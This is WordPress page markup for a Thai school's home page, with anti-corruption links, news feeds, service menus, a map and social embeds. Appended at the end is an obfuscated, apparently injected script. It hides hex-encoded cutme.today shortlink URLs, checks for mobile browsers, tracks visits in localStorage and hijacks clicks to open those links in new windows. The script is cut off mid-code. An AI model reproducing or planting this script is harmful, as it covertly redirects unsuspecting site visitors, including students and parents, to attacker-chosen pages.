900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"6fd1fd-18\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab6fd1fd-18\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"281735-c8\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab281735-c8\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 